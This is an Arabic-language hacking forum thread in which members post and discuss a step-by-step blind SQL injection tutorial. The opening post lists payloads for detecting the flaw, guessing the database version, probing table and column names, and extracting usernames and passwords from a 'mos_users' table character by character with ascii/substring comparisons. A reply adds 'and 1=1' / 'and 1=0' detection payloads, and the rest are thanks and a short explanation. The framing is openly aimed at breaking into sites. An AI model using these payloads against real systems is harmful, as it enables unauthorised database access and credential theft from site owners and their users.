ربنا يوفقني volcano بتعلم هكر البلايند وان شاء الله ينجح بالتعليم :) volcano بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي يلا...

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ترتيب الخطوات للبلايد سكول
ربنا يوفقني​

volcano
بتعلم هكر البلايند
وان شاء الله ينجح بالتعليم​

:)




بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي​

يلا نتابع​


امر اكتشاف الخطأ​




2- امر التاكد من ان البلايند يعمل​

and (select 1)=1


3- امر معرفه اصدار القاعده​

and substring(@@version,1,1)=5

and substring(@@version,1,1)=4

4- امر لمعرفه اسم الجدول نستعمل امر​

and (select 1 from table_name limit 0,1)=1

5-​

امر لمعرفه اسم عامود اليوزر والباسوورد نستعمل هذا الامر​


and (select substring(concat(1,column_name),1,1) from table_name limit 0,1)=1​


6- اليوزر نيم والباسورد بحقنه واحده​

and (select substring(concat(1,concat(username,0x3a,password)),1,1) from mos_users limit 0,1)=1


7-
اللعب مع تشفير
ascii
لاستخارج اليوزر والباسورد
فولكانو هكر تابع :)



and ascii(substring((SELECT concat(username,0x3a,password) from mos_users limit 0,1),1,1))>1


هنا نزود باللعبه​

على​
سطر فولكانو الاحمر انتبه
-------------------volcano--------------------


وهكذا ليطلع لنا الخطا​

ثم بعدها نلعب بنفس الطريقه لكن العد بكون هون​

ونكمل بزياده على نفس الاسلوب
من عند سطر فولكانو الاحمر
السابق
لحتى يرجع لنا خطا
وهطذا​

الان بس نخلص نجمع الارقام الي تطلع لنا​

ونروح لهذا الموقع​


لحتى نفك التشفير​

بالتوفيق​

ولا اخو 8898998
يسرق الموضوع لانه فهي اخطاء لسا ما خلصته
بس اخلصه بقلكم الطشوه يا 89088






 

MrXRoMaNcE1

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ترتيب الخطوات للبلايد سكول
يعطيك العافية

اضافة بسيطة لاكتشاف تغرة

PHP:
+and+1=1

لا يحدث تغير لاكن عندما نضع

PHP:
+and+1=0

يحدث تغير بصفحة لو بسيط او كبير او ممكن يظهر خطأ هكذا نعرف انها بلايند

وبالنسبة لمعرفة اصدار قاعدة

نضع

PHP:
AND SUBSTRING(@@version,1,1)=4

اذا تغير محتوى صفحة يعني اصدار ليس 4

نجرب امر تالي

PHP:
AND SUBSTRING(@@version,1,1)=5

اذا ما تغير هذا يعني انه الاصدار 5

ويعطيك العافية بانتظار جديدك يالغالي
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ترتيب الخطوات للبلايد سكول
يسلمو فايروس هكر ع الاضافه والتوضيح بارك الله فيك
 

T3BaN_HaCkEr

New Member
ترتيب الخطوات للبلايد سكول
يسلمو يا حجاج

اول مرة بسمع فيها

يلا معاكم نتعلم شوو علينا :)
 

ToRn4Do

<font color="#FDD017">:: مشـــرف سـابق ::</font>
ترتيب الخطوات للبلايد سكول
يعطيكم العافية شباب مبدعين

مشكور يا فولكانو

اقبل مروري
 

Dr.NaNo

New Member
ترتيب الخطوات للبلايد سكول
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
 
ترتيب الخطوات للبلايد سكول
يسلمو اخى فولكانو
بس لازم تعملنا درس فيديو
لان الحوار ده كده قالب دماغى

مش قادر افكر فيه
ياريت اخى اكرمك الله تعرفلنا ما هو هاكر البلايند والكلام ده

ضرووووووووووووووووووووورى
 

Prince-Of-Hacker

:: Interactive Developer ::
ترتيب الخطوات للبلايد سكول
بس يا ليت تسوي شرح في الفيديو حبيبي بكون اسهل علينا تقبل مروري
 

H3x HaCkeR

New Member
ترتيب الخطوات للبلايد سكول
مشكور على الدرس الجميل
لكني عندي ملاحــظــة :D
الـ Blind SQL فرقها عن الـ SQL injection
شي بسيط الا وهو
الفرق الأساسي والوحيد بين هالنوعين ان الأول لا يظهر ناتج الاستعلامات.. والسبب برمجي لاغير << !!!!
في الثغرة التقليدية, سبب ظهور ارقام الاستغلال او الأعمدة وغيره هو وجود تعليمة print او echo في الكود لطباعة الأعمدة, في حال ماكانت موجودة فرح يظهرلك البلايند وقتها.
يعني لاتعتمد اعتماد كلي على علامــة '
 
أعلى